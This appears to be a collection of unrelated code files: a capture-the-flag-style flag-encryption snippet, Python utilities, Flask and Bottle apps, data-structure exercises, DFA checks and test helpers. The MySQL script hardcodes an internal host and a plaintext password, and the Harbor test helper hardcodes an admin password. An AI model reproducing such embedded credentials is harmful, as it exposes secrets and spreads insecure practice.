p = 1044388881413152506679602719846529545831269060992135009022588756444338172022322690710444046669809783930111585737890362691860127079270495454517218673016928427459146001866885779762982229321192368303346235204368051010309155674155697460347176946394076535157284994895284821633700921811716738972451834979455897010306333468590751358365138782250372269117968985194322444535687415522007151638638141456178420621277822674995027990278673458629544391736919766299005511505446177668154446234882665961680796576903199116089347634947187778906528008004756692571666922964122566174582776707332452371001272163776841229318324903125740713574141005124561965913888899753461735347970011693256316751660678950830027510255804846105583465055446615090444309583050775808509297040039680057435342253926566240898195863631588888936364129920059308455669454034010391478238784189888594672336242763795138176353222845524644040094258962433613354036104643881925238489224010194193088911666165584229424668165441688927790460608264864204237717002054744337988941974661214699689706521543006262604535890998125752275942608772174376107314217749233048217904944409836238235772306749874396760463376480215133461333478395682746608242585133953883882226786118030184028136755970045385534758453247
g = 5
A = 1026312539297800437474663698165859314949881437729617621666434357798219198741950468733395500361477359726152747087790103309627020498122003777642051150130697457594304849673838709900017711265818285080832347734747895550397950729716624922572654209637755195129162139245110756558638081495998280747642920484467428206475906559638681536868548289456924005274209311355030582255692087426910634838198143851507435754029135363794578075936092774722678311786272841489629294721103591751528609388061794369341067986401129462942050916582521451289187645626081017578576190303952351748434876686541368607656026867091583868645619423975306245327421218767449273192101105293424028461698783545171866070124432565063559495566733441286372612161876492134408160732339966921175762866198980795890946054558528891296203285979664329713156129091098226212735763844909789916934266711879564086741733061623347281499025678164709559814150194881622611023214199434022258730549350019749882889143749385314934896284396513061241138504029046053964944026179039768718830854958634216721133676746317913559932277050177463811150719675119168868527853864167729206220819613297736800799391257602899169041109002518019207734013899840092155297682096290489330476118066934735827328128343402508975429994312
d = key
m = int(flag.encode('hex'), 16) % p
B = pow(g, d, p)
k = pow(A, d, p)
c = k * m % p
f.write(str(B) + '\n')
f.write(str(c) + '\n')
f.close()
|
996,178 | 7f832976a6a837ea754024c0d6da1966c4120e43 | """Take header file and runcc file and make the job files"""
import os, sys
head = sys.argv[1]
job = sys.argv[2]
with open(head) as h:
header = h.readlines()
n = 0
with open(job) as j:
for line in j:
out_name = 'job' + str(n) + '.sh'
out = open(out_name, 'w')
for h in header:
out.write(h)
out.write(line)
n += 1
|
996,179 | 3795030922832334defa0b242fbd602bb65c49c1 | import os, sys
BASE_DIR = os.getcwd()
sys.path.append(BASE_DIR)
from app_porcess.dbUtls import MysqlPool
import json
import time
if __name__ == '__main__':
pool = MysqlPool(host="10.144.15.187", port=3815, username='spider', passwd='QAZwsxEDC', db='spider')
jstr = '{"test":1}'
jobj = json.dumps(jstr, ensure_ascii=False)
item = dict(display_url="1", large_image_list_url="2", title="3", source="4")
sql = 'insert into android_toutiao_app(meta_data, display_url, large_image_list, title, `source`, create_time) value (%s,%s,%s,%s,%s, %s);'
data_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
args = (jstr, item.get('display_url'), item.get('large_image_list_url'), item.get('title'), item.get('source'), data_time)
pool.insert(sql, args) |
996,180 | b023b76b8a8fabca315b91a249254236b8c29a9c | import bottle
import json
import os
from client import Robot, get_commands, write_read
class Controller(object):
def __init__(self, robot, path=os.getcwd()):
self.robot = robot
self.bottle = bottle
self.commands = self.robot.commands
@self.bottle.route('/command_tree')
def command_tree(self):
return json.dumps(self.commands)
@self.bottle.route('/run/<command>/')
def run(self, command):
return json.dumps({"response"
: write_read(self.commands[command])})
@self.bottle.route('/style.css')
def style(self):
return bottle.static_file('/style.css',root=path)
@self.bottle.route('/')
def controller(self):
return bottle.template('controller',
do = self.robot.do,
question = self.robot.question,
info = self.robot.info,
stop = self.robot.do)
if __name__ == "__main__":
my_bot = Robot(get_commands())
my_controller = Controller(my_bot)
bottle.run(host="localhost", port="8000")
|
996,181 | 030dddf4c921e4acf888a31d7373a8e1cf217696 | from artifacts.models import Artifact
from data_info import *
try:
for i in items:
try:
temp_art = Artifact.objects.get(title=i.title, price=i.price, description=i.description)
except Artifact.DoesNotExist:
print "Adding " + i.title + " to database"
i.save()
except:
##that's an error
print ":("
##if only it could be somebody else's problem...
raise
|
996,182 | 0bc665ff8d792a9622f71dcfca0afd8c4c4bd18c | import argparse
import json
import matplotlib
matplotlib.use('Agg')
import matplotlib.pylab as plt
import seaborn as sns
import pandas as pd
parser = argparse.ArgumentParser()
parser.add_argument('--json-result')
args = parser.parse_args()
results = json.load(open(args.json_result))
tab_results = []
for r in results:
if not r['model'] in ('BERT', 'ROBERTA', 'BERTL', 'ROBERTAL'):
continue
model_names = {
'BERT': 'BERT-base',
'ROBERTA': 'RoBERTa-base',
'BERTL': 'BERT-large',
'ROBERTAL': 'RoBERTa-large',
}
r['model'] = model_names[r['model']]
if r['rm_overlap'] > 0:
r['removed_fraction'] = r['rm_overlap'] * 100
r['strategy'] = 'overlap'
tab_results.append(r)
elif r['rm_random'] > 0:
r['removed_fraction'] = r['rm_random'] * 100
r['strategy'] = 'random'
tab_results.append(r)
else:
r['removed_fraction'] = 0
r['strategy'] = 'overlap'
tab_results.append(r)
r = dict(r)
r['strategy'] = 'random'
tab_results.append(r)
df = pd.DataFrame(data=tab_results)
sns.set(style="whitegrid")
sns.set(font_scale=1.7)
g = sns.catplot(data=df, x='removed_fraction', y='acc', hue='strategy', col='model', kind='point')
g.set_axis_labels('% training data removed', 'accuracy (%)')
g.savefig('remove.pdf')
|
996,183 | 31192e7cdbfcd51cf38e3c7e5656041e8e4f8155 | version https://git-lfs.github.com/spec/v1
oid sha256:5314b6d0e1f855390d3aa87682038d21b2343d5010df8c367d7c707a8c7fa3cf
size 10210
|
996,184 | 961cd4781cbd4c35f1c9354f6a57eb2e0ab28d7c | #
# This computer program is the confidential information and proprietary trade
# secret of Anuta Networks, Inc. Possessions and use of this program must
# conform strictly to the license agreement between the user and
# Anuta Networks, Inc., and receipt or possession does not convey any rights
# to divulge, reproduce, or allow others to use this program without specific
# written authorization of Anuta Networks, Inc.
#
# Copyright (c) 2016-2017 Anuta Networks, Inc. All Rights Reserved.
#
#
#ALL THE CUSTOMIZATIONS REGARDING DATAPROCESSING SHOULD BE WRITTEN INTO THIS FILE
#
"""
Tree Structure of Handled XPATH:
services
|
managed-cpe-services
|
customer
|
eem-applets
|
event-manager-applet
|
actions
|
action
Schema Representation:
/services/managed-cpe-services/customer/eem-applets/event-manager-applet/actions/action
"""
"""
Names of Leafs for this Yang Entity
label maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/label
action-statement maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/action-statement
cli-type maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/cli-type
cli-string maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/cli-string
regex-pattern maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/regex-pattern
input-string maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/input-string
syslog-priority maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/syslog-priority
syslog-msg maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/syslog-msg
first-operand maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/first-operand
compare maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/compare
second-operand maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/second-operand
exit-result maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/exit-result
comment-string maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/comment-string
handle-error-type maps-to /ac:devices/ac:device/l3:eem-applets/event-manager-applet/actions/action/handle-error-type
"""
from servicemodel import util
from servicemodel import yang
from servicemodel import devicemgr
from cpedeployment.cpedeployment_lib import getLocalObject
from cpedeployment.cpedeployment_lib import getDeviceObject
from cpedeployment.cpedeployment_lib import getCurrentObjectConfig
from cpedeployment.cpedeployment_lib import getPreviousObjectConfig
from cpedeployment.cpedeployment_lib import ServiceModelContext
from cpedeployment.cpedeployment_lib import getParentObject
from cpedeployment.cpedeployment_lib import log
class ServiceDataCustomization:
@staticmethod
def process_service_create_data(smodelctx, sdata, dev, **kwargs):
""" Custom API to modify the inputs"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.items():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
inputkeydict = kwargs['inputkeydict']
@staticmethod
def process_service_device_bindings(smodelctx, sdata, dev, **kwargs):
""" Custom API to modify the device bindings or Call the Business Login Handlers"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.items():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
inputkeydict = kwargs['inputkeydict']
devbindobjs = kwargs['devbindobjs']
id = kwargs['id']
opaque_args = kwargs['hopaque']
import cpedeployment.cpedeployment_grouping_lib.eem_applet_customization
cpedeployment.cpedeployment_grouping_lib.eem_applet_customization.grouping_create_eem_applet_event_manager_applet_actions_action(smodelctx, sdata, dev, xpath='managed-cpe-services/customer/eem-applets/event-manager-applet/actions/action', **kwargs)
if dev is None or (isinstance(dev, list) and len(dev) == 0):
return
_event_manager_applet_obj = getLocalObject(sdata, 'event-manager-applet')
inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'] = _event_manager_applet_obj.event_manager_applet.applet_name
from servicemodel.device_abs_lib import device_eem_applets
if inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'] is not None and inputdict['label'] is not None:
device_eem_applets.eem_applets.event_manager_applet.actions.action().create(sdata, dev, inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'], fill_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, sdata=sdata), addref=True)
@staticmethod
def process_service_update_data(smodelctx, sdata, **kwargs):
"""callback called for update operation"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.items():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
id = kwargs['id']
opaque_args = kwargs['hopaque']
#Previous config and previous inputdict
pconfig = kwargs['pconfig']
pinputdict = kwargs['pinputdict']
dev = kwargs['dev']
import cpedeployment.cpedeployment_grouping_lib.eem_applet_customization
cpedeployment.cpedeployment_grouping_lib.eem_applet_customization.grouping_update_eem_applet_event_manager_applet_actions_action(smodelctx, sdata, xpath='managed-cpe-services/customer/eem-applets/event-manager-applet/actions/action', **kwargs)
if dev is None or (isinstance(dev, list) and len(dev) == 0):
return
_event_manager_applet_obj = getLocalObject(sdata, 'event-manager-applet')
inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'] = _event_manager_applet_obj.event_manager_applet.applet_name
from servicemodel.device_abs_lib import device_eem_applets
up_map_devices_device_eem_applets_event_manager_applet_actions_action = fill_up_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, pinputdict, sdata=sdata)
if up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-delete-create' or up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-delete':
device_eem_applets.eem_applets.event_manager_applet.actions.action().delete(sdata, dev, inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'], fill_map_devices_device_eem_applets_event_manager_applet_actions_action(pinputdict), remove_reference=True)
if up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-delete-create' or up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-create':
device_eem_applets.eem_applets.event_manager_applet.actions.action().create(sdata, dev, inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'], up_map_devices_device_eem_applets_event_manager_applet_actions_action[0], addref=True)
if up_map_devices_device_eem_applets_event_manager_applet_actions_action[1] == 'key-unchanged':
device_eem_applets.eem_applets.event_manager_applet.actions.action().update(sdata, dev, inputdict['managed_cpe_services_customer_eem_applets_event_manager_applet_applet_name'], fill_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, pinputdict=pinputdict, sdata=sdata, update=True))
@staticmethod
def process_service_delete_data(smodelctx, sdata, **kwargs):
"""callback called for delete operation"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.items():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
dev = kwargs['dev']
id = kwargs['id']
opaque_args = kwargs['hopaque']
import cpedeployment.cpedeployment_grouping_lib.eem_applet_customization
cpedeployment.cpedeployment_grouping_lib.eem_applet_customization.grouping_delete_eem_applet_event_manager_applet_actions_action(smodelctx, sdata, xpath='managed-cpe-services/customer/eem-applets/event-manager-applet/actions/action', **kwargs)
if dev is None or (isinstance(dev, list) and len(dev) == 0):
return
def fill_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, sdata=None, pinputdict={}, delete=False, update=False):
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action = {}
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['first_operand'] = inputdict['first_operand'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['cli_string'] = inputdict['cli_string'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['syslog_priority'] = inputdict['syslog_priority'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['syslog_msg'] = inputdict['syslog_msg'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['action_statement'] = inputdict['action_statement'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['label'] = inputdict['label'] if not update else inputdict['label'] if inputdict['label'] is not None else pinputdict['label']
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['second_operand'] = inputdict['second_operand'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['comment_string'] = inputdict['comment_string'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['cli_type'] = inputdict['cli_type'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['exit_result'] = inputdict['exit_result'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['handle_error_type'] = inputdict['handle_error_type'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['input_string'] = inputdict['input_string'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['regex_pattern'] = inputdict['regex_pattern'] if not delete else ''
mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['compare'] = inputdict['compare'] if not delete else ''
return mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action
def fill_up_map_devices_device_eem_applets_event_manager_applet_actions_action(inputdict, pinputdict, sdata=None):
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action = {}
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['first_operand'] = inputdict['first_operand']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['cli_string'] = inputdict['cli_string']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['syslog_priority'] = inputdict['syslog_priority']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['syslog_msg'] = inputdict['syslog_msg']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['action_statement'] = inputdict['action_statement']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['label'] = inputdict['label'] if inputdict['label'] is not None and inputdict['label'] != '' else pinputdict['label']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['second_operand'] = inputdict['second_operand']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['comment_string'] = inputdict['comment_string']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['cli_type'] = inputdict['cli_type']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['exit_result'] = inputdict['exit_result']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['handle_error_type'] = inputdict['handle_error_type']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['input_string'] = inputdict['input_string']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['regex_pattern'] = inputdict['regex_pattern']
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['compare'] = inputdict['compare']
if up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action.get('label') is None:
up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action['label'] = pinputdict['label']
if inputdict['first_operand'] is None and inputdict['cli_string'] is None and inputdict['syslog_priority'] is None and inputdict['syslog_msg'] is None and inputdict['action_statement'] is None and inputdict['label'] is None and inputdict['second_operand'] is None and inputdict['comment_string'] is None and inputdict['cli_type'] is None and inputdict['exit_result'] is None and inputdict['handle_error_type'] is None and inputdict['input_string'] is None and inputdict['regex_pattern'] is None and inputdict['compare'] is None:
return [up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action, 'no-change']
up_schema = 'key-unchanged'
del_mandatory = False
if inputdict['label'] is not None and pinputdict['label'] is not None:
up_schema = 'key-delete-create'
return [up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action, up_schema]
elif inputdict['label'] == '':
up_schema = 'key-delete'
del_mandatory = True
elif inputdict['label'] is None and pinputdict['label'] is None:
up_schema = 'no-change'
elif inputdict['label'] is not None:
up_schema = 'key-create'
else:
up_schema = 'key-unchanged'
if del_mandatory and up_schema != 'key-create':
up_schema = 'key-delete'
elif del_mandatory and up_schema == 'key-create':
up_schema = 'key-delete-create'
return [up_mapping_dict_devices_device_eem_applets_event_manager_applet_actions_action, up_schema]
class DeletePreProcessor(yang.SessionPreProcessor):
def processBeforeReserve(self, session):
operations = session.getOperations()
"""Add any move operations for Deletion"""
log('operations: %s' % (operations))
class CreatePreProcessor(yang.SessionPreProcessor):
def processBeforeReserve(self, session):
operations = session.getOperations()
"""Add any move operations for creation"""
log('operations: %s' % (operations))
|
996,185 | a32e2bc38e2dbc8090041c90e1a19dad1c1e0eff | import time
import os
import sys
sys.path.append(os.environ["SWAGGER_CLIENT_PATH"])
from swagger_client.rest import ApiException
import swagger_client.models
from pprint import pprint
admin_user = "admin"
admin_pwd = "Harbor12345"
harbor_server = os.environ["HARBOR_HOST"]
#CLIENT=dict(endpoint="https://"+harbor_server+"/api")
ADMIN_CLIENT=dict(endpoint = "https://"+harbor_server+"/api", username = admin_user, password = admin_pwd)
USER_ROLE=dict(admin=0,normal=1)
TEARDOWN = True
def GetProductApi(username, password, harbor_server= os.environ["HARBOR_HOST"]):
cfg = swagger_client.Configuration()
cfg.host = "https://"+harbor_server+"/api"
cfg.username = username
cfg.password = password
cfg.verify_ssl = False
cfg.debug = True
api_client = swagger_client.ApiClient(cfg)
api_instance = swagger_client.ProductsApi(api_client)
return api_instance
class TestResult(object):
def __init__(self):
self.num_errors = 0
self.error_message = []
def add_test_result(self, error_message):
self.num_errors = self.num_errors + 1
self.error_message.append(error_message)
def get_final_result(self):
if self.num_errors > 0:
for each_err_msg in self.error_message:
print "Error message:", each_err_msg
raise Exception(r"Test case failed with {} errors.".format(self.num_errors))
|
996,186 | d05737653713752f45977ee2dd98e023e8f1cbb5 | # empty list # my_list = []
# list of integers # my_list = [1, 2, 3]
# list with mixed data types # my_list = [1, "Hello", 3.4]
# nested list # my_list = ["mouse", [8, 4, 6], ['a']]
# Defining list
list1 = list([1, 3, 5])
print('The Normal list {0} '.format(list1))
# List Index
print('first value is {0} '.format(list1[0]))
print('second value is {0} '.format(list1[-2]))
print('from second to third value is {0} '.format(list1[1:3]))
print('first and third values is {0} and {1} '.format(list1[0], list1[2]))
print('from beginning to second value is {0} '.format(list1[:2]))
# Change element
list1[0] = 4
print('Here is the change {0}'.format(list1))
# add elements
list1.append(7)
print('added element {0}'.format(list1))
list1.extend([9,11,13])
print('added elements {0}'.format(list1))
# remove elements
list1.remove(13) # (The element itself)
print('element deleted : {0}'.format(list1))
list1.pop(5) # (The Index Number)
print('element deleted : {0}'.format(list1))
# list1.clear() # removing everything
print('elements cleared : {0}'.format(list1))
# some tricks
# list1.sort() # sort A-Z
# list1.reverse() # reverse order
# list1.count() # save to main list
# list1.insert(6, 1) # add element in specific index
# print('list manipulated {0}'.format(list1))
# print(9 in list1) # Membership test
# print(list1[1] is 3) # validate test
|
996,187 | aed574f25b363b9613b4c595a8001055fded6eef | """
#ch11_26 遞迴式函數設計
#特色:每次呼叫自己時,都會使範圍越來越小;必須要有一個終止條件來結束遞迴函數
def factorial(n):
#計算n的階乘,n必須為整數
if n == 1:
return 1
else:
return (n * factorial(n-1)) #5*後,開啟一個4的factorial程式,得出4*....直到輸出1,5*4*3*2*factorial(1)
value = 3
print(value, "的階乘結果是 =", factorial(value))
value = 5
print(value, "的階乘結果是 =", factorial(value))
"""
"""
#ch11_30_2 global 應用
def printmsg():
global msg
msg = "Java"
print("函數列印:更改後:, msg")
msg = "Python"
print("主程式列印:更改前", msg)
printmsg()
print("主程式列印:更改後", msg)
"""
"""
#ch11_31 匿名函數的應用 lambda
def square(x):
value = x ** 2
return value
print(square(10))
square = lambda x: x **2
print(square(10))
"""
"""
#ch11_34 匿名函數使用與filter
def oddfn(x):
return x if (x % 2 == 1) else None
mylist = [5, 10, 15, 20, 25, 30]
filter_object = filter(oddfn, mylist)
print("奇數串列嗎:", [item for item in filter_object])
"""
# #Ch11_37
# mylist = [5, 10, 15, 20, 25, 30]
# squarelist = list(map(lambda x: x ** 2, mylist)) # map(func, iterable),可以將string, list, tuple, 的item放進去function進行計算。
# print("串列平方值:", squarelist)
"""
#ch11_39_1 設計自己的range()
def myRanger(start = 0, stop = 100, step = 1):
n = start
while n < stop:
yield n
n += step
print(type(myRanger))
for x in myRanger(0, 5):
print(x)
#設計之函數資料型態為function,與range類似,但回傳值不是使用return 而是yield,同時整個函數內部不是立即執行,第一次for回圈執行到yield時會回傳n,下一次會繼續執行n+=6ㄝ然後回到起點執行到yield,直到沒有直回傳。
"""
"""
#ch11_39_2 裝飾器(Decorator)
#可以將函數程式傳入另一個函數程式
def upper(func): #裝飾器 #func = greeting()
def newFunc(args):
oldresult = func(args) #greeting(args) => return args
newresult = oldresult.upper() # (args).upper()
print("函數名稱:", func.__name__)
print("函數參數:", args)
return newresult
return newFunc
@upper #設定裝飾器
def greeting(string): #問號函數
return string
# mygreeting = upper(greeting) #手動裝飾器
# print(mygreeting("Hello! iPhone")) #輸入 "Hello! iPhone" => string
print(greeting("Hello! iPhone"))
"""
# #ch11_39_4 除法除錯器
# """裝飾器應用"""
# def errcheck(func):
# def newFunc(*args):
# if args[1] != 0: #除數不等於0時
# result = func(*args)
# else:
# result = "除數不可爲0"
# print("函數名稱:", func.__name__)
# print("函數參數:", args)
# print("執行結果:", result)
# return result
# return newFunc
# @errcheck
# def mydiv(x, y):
# return x/y
# print(mydiv(6, 3))
# print(mydiv(6, 0)) |
996,188 | 40a682dbbba03e4ee23ca45db37a49f198bfd2c8 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
import json,os,sys
from flask import request, g, jsonify
from . import Resource
from .. import schemas
class Dentists(Resource):
def get(self):
with open(sys.path[0]+'/v1/api/dentists.json') as json_data:
d = json.load(json_data)
#return jsonify(d), 200, None
return jsonify({"dentists":d['dentists']})
def post(self):
with open(sys.path[0]+'/v1/api/dentists.json') as json_data:
d = json.load(json_data)
dentist = {
'id': d['dentists'][-1]['id'] + 1,
'name': g.json['name'],
'location': g.json['location'],
'spec' :g.json['specialisation']
}
d['dentists'].append(dentist)
filename = sys.path[0]+'/v1/api/dentists.json'
with open(filename, "w") as jsonFile:
json.dump(d, jsonFile, indent=4)
return jsonify({"dentists":d['dentists']})
|
996,189 | f588ae7733dbb3d9cee36b10985504d5af4dd485 | import onnx
from onnx_tf.backend import prepare
onnx_model = onnx.load('dbface.onnx')
tf_rep = prepare(onnx_model)
tf_rep.export_graph('dbface_tf.pb') |
996,190 | f03948898f21e3900fd5898fef6639bb0b0665d4 | class Node:
def __init__(self, value=None):
self.value = value
self.next = None
def __str__(self):
return str(self.value)
class LinkedList:
def __init__(self):
self.head = None
self.tail = None
class Queue:
def __init__(self):
self.linkedList = LinkedList()
def __str__(self):
values = [str(x) for x in self.linkedList]
return ' '.join(values)
def enqueue(self, value):
newNode = Node(value)
if self.linkedList.head == None:
self.linkedList.head = newNode
self.linkedList.tail = newNode
else:
self.linkedList.tail.next = newNode
self.linkedList.tail = newNode
def isEmpty(self):
if self.linkedList.head == None:
return True
else:
return False
def dequeue(self):
if self.isEmpty():
return "There is not any node in the Queue"
else:
tempNode = self.linkedList.head
if self.linkedList.head == self.linkedList.tail:
self.linkedList.head = None
self.linkedList.tail = None
else:
self.linkedList.head = self.linkedList.head.next
return tempNode
def peek(self):
if self.isEmpty():
return "There is not any node in the Queue"
else:
return self.linkedList.head
def delete(self):
self.linkedList.head = None
self.linkedList.tail = None
class TreeNode:
def __init__(self, data):
self.data = data
self.leftChild = None
self.rightChild = None
def search_bt(rootNode, nodeValue):
if not rootNode:
return "The BT does not exist"
else:
customQueue = Queue()
customQueue.enqueue(rootNode)
while not(customQueue.isEmpty()):
root = customQueue.dequeue()
if root.value.data == nodeValue:
return "Success"
if (root.value.leftChild is not None):
customQueue.enqueue(root.value.leftChild)
if (root.value.rightChild is not None):
customQueue.enqueue(root.value.rightChild)
return "Not found"
def insert_node_bt(rootNode, newNode):
if not rootNode:
rootNode = newNode
else:
customQueue = Queue()
customQueue.enqueue(rootNode)
while not(customQueue.isEmpty()):
root = customQueue.dequeue()
if root.value.leftChild is not None:
customQueue.enqueue(root.value.leftChild)
else:
root.value.leftChild = newNode
return "Successfully Inserted"
if root.value.rightChild is not None:
customQueue.enqueue(root.value.rightChild)
else:
root.value.rightChild = newNode
return "Successfully Inserted"
def delete_bt(rootNode):
rootNode.data = None
rootNode.leftChild = None
rootNode.rightChild = None
return "The BT has been successfully deleted"
|
996,191 | ede13f3694b5534c0d002b5613c15af9d37e9dc2 | valor = float(raw_input())
if valor >= 0.00 and valor <= 2000.00:
print "Isento"
elif valor >= 2000.01 and valor <= 3000.00:
extraum = 2000 - abs(valor)
taxaum = extraum * 8/100
print "R$ %.2f" %(abs(taxaum))
elif valor > 3000 and valor <= 4500.00:
extradois = valor - 3000
taxaextra = extradois * 18/100
total = 80.00 + taxaextra
print "R$ %.2f" %(total)
else:
extradoiss = valor - 4500
taxaextraa = extradoiss * 28/100
totall = 80.00 + 270.00 + taxaextraa
print "R$ %.2f" %(totall)
|
996,192 | dea4610b38cd6d4e1959e0c1c12d0a1076370ee9 | #code written by John Andrews
#last updated on Dec 5 2018
#This file contains code for determining properties about a DFA.
import queue
def determine_empty(input_dfa):
finals = input_dfa.get_finals()
#is the start state is a final, then the language is certainly not empty due to epsilon
if 0 in finals:
return False
visitable_states = get_reachability_from(input_dfa,0)
empty = True
if overlap(finals, visitable_states):
empty = False
return empty
def get_reachability_from(input_dfa,state):
transit_tab = input_dfa.get_transit_tab()
states_to_check = queue.Queue()
states_to_check.put(state)
visitable_states = []
while not states_to_check.empty():
current = states_to_check.get()#current state we're looking out from
cur_row = transit_tab[current]#all the transitions that could be made from there
for x in cur_row:
if cur_row[x] not in visitable_states:
states_to_check.put(cur_row[x])
visitable_states.append(cur_row[x])
return visitable_states
def determine_infinite(input_dfa):
infinite = False
if determine_empty(input_dfa):#if it is empty, it is certainly not infinite
return infinite
reachability_by_state = []
num_states = len(input_dfa.get_transit_tab())
for x in range(0, num_states):
reach = get_reachability_from(input_dfa,x)
reachability_by_state.append(reach)
#determine the finals that actually matter
visitable_states = reachability_by_state[0]
finals = input_dfa.get_finals()
reachable_finals = []
for x in finals:
if x in visitable_states:
reachable_finals.append(x)
#look for states that meet the requirements for infinite
for x in range(0,num_states):
if x in reachability_by_state[x]:#if there is a loop
if x in reachability_by_state[0]:#if the loop can be reached from the initial state
if overlap(reachable_finals, reachability_by_state[x]):#if you can reach a final state
infinite = True
return infinite
def overlap(l1, l2):
#this check is to keep the run time of this algorithm down to min len(l1),len(l2)
if len(l1) < len(l2):
for x in l1:
if x in l2:
return True
else:
for x in l2:
if x in l1:
return True
return False
|
996,193 | 1456afb4c31cd010fc385ae9e2f0fb95a0669925 | import datetime
last_id = 0
# deifne a note
class Note:
def __init__(self, memo, tags=''):
self.memo = memo
self.tags = tags
self.creationDate = datetime.date.today()
global last_id
last_id += 1
self.__id = last_id
def getId(self):
return self.__id |
996,194 | b37fdeb1e59c7e7fa7e566bb44b1d58aa364ee71 | # -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
import pytest
from json import dumps
from mock import patch
from fn_microsoft_security_graph.lib.ms_graph_helper import MSGraphHelper
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
PACKAGE_NAME = "fn_microsoft_security_graph"
FUNCTION_NAME = "microsoft_security_graph_get_alert_details"
# Read the default configuration-data section from the package
config_data = get_config_data(PACKAGE_NAME)
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def generate_response(content, status):
class simResponse:
def __init__(self, content, status):
self.status_code = status
self.content = content
self.text = dumps(content)
def json(self):
return self.content
return simResponse(content, status)
def call_microsoft_security_graph_get_alert_details_function(circuits, function_params, timeout=10):
# Fire a message to the function
evt = SubmitTestFunction("microsoft_security_graph_get_alert_details", function_params)
circuits.manager.fire(evt)
event = circuits.watcher.wait("microsoft_security_graph_get_alert_details_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
class TestMicrosoftSecurityGraphGetAlertDetails:
""" Tests for the microsoft_security_graph_get_alert_details function"""
def test_function_definition(self):
""" Test that the package provides customization_data that defines the function """
